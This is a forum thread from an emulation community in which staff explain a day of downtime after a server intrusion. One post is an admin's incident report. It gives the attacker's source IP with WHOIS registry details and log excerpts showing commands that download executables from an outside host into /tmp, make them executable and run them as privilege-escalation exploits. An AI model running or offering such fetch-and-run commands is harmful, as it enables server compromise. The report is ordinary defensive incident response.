Hacker Trouble

[Alpha]

Sorry for the 1 day downtime; we had some hacker trouble yesterday afternoon. Apparently they thought they were smart enough to overtake the entire server, but they had no idea who they were messing with. There shouldn't be anymore downtime for a while as we have patched up the server. Currently, we are hoping in getting our own dedicated server, but we're short on money. If you can DONATE, that would be much appreciated.

 

Regards,

1Emulation Staff

 

»» Donate to 1Emulation Servers

[sammaz]

wtf who has a beef with 1 emu?

[garyoak99]

Thanks for the update! I'm just glad the forum is back!

[someboddy]

wtf who has a beef with 1 emu?

<{POST_SNAPBACK}>

 

We are not sure the attack was against 1Emulation. There are other sites on this server.

[Alpha]

wtf who has a beef with 1 emu?

 

We are not sure the attack was against 1Emulation. There are other sites on this server.

From the looks of it, we were affected the worst. So it could have very well been us, but we won't be able to know for certain.

[Weirdy]

Was it some kind of F5 terrorist? Perhaps it could've been our good ol' friend Eugene.

Edited April 11, 2006 by Weirdy

[fischju]

Did you ban any1 recently that seemed 1337 in anyway? And F5 is old...i like to find files hosted on a server and download and delete them with a script and leave it on overnight.....not that I would do that to you guys.....just saying

[Alpha]

Did you ban any1 recently that seemed 1337 in anyway? And F5 is old...i like to find files hosted on a server and download and delete them with a script and leave it on overnight.....not that I would do that to you guys.....just saying

I haven't banned anyone since January. And I haven't a sign of the guy I banned anywhere. He didn't seem 1337 either, only a proxy-tard.

[miskie]

Hacker report :

 

The hacker's LAst IP address before getting into the server was 147.46.127.205

 

this is the data I can pull on it..

 

# ENGLISH

KRNIC is not an ISP but a National Internet Registry similar to APNIC.
The followings is organization information that is using the IPv4 address.

IPv4 Address       : 147.46.0.0-147.46.255.255
Network Name       : NET-SNU
Registration Date  : 20040625
Publishes          : Y

[ Organization Information ]
Organization ID    : ORG384075
Org Name           : Seoul National University 
Address            : Sillim9-dong, Gwanak-gu, Seoul
Detail address     : San56-1Beonji Jungangjeonsanwon
Zip Code           : 151-742

[ Technical Contact Information ]
Name               : Eunjoo Jung
Org Name           : Seoul National University
Address            : Sillim9-dong, Gwanak-gu, Seoul
Detail address     : San56-1Beonji Jungangjeonsanwon
Zip Code           : 151-742
Phone              : +82-2-880-5380
E-Mail             : ********@plaza.snu.ac.kr

 

once they got in thru this exploit

 

http://www.google.com/search?hl=en&q=Psych...G=Google+Search

 

their IP became 127.0.0.1 and their username apache..

 

heres some log data of what they did once inside, pretending to be apache -- here the user is downloading crap into the servers TMP folder..

 

--16:51:24--  http://xpl.netmisphere2.com/r0nin
          => `r0nin'
Resolving xpl.netmisphere2.com... done.
Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,258 [application/x-executable]

   0K..................                                   100%   45.98 KB/s

16:51:25 (45.98 KB/s) - `r0nin' saved [19258/19258]

 

and here is some other stuff they ran before I caught them

 

finger
cd /tpm
cd /tmp
wget http://xpl.netmisphere2.com/brk2
chmod 777 brk2
./brk2
wget http://xpl.netmisphere2.com/uselib24
chmod 777 uselib24
./uselib24
./uselib24
id
./uselib24

 

Though this looks bad, this kind of hack is more of a PITA than a security-threatening one - they disrupted the server and apparantly banged the hell out of 1emulation's database -- I cant be sure if it was directed or not (since once they were in they 'became' apache -- which the server doesnt see as a threat. ) at 1emulation specifically, or if this site was just chosen at random.

 

anyway, all the code has been deleted, the exploits have been plugged. Ive been watching the server for the last couple of hours and there is nothing going on of interest at all.

[Agozer]

Well, things are back to normal. Let's resume our daily forum activities.

[CJ Jackson]

That explains the earlier MySQL error "Too Many Connections", this is just criminal.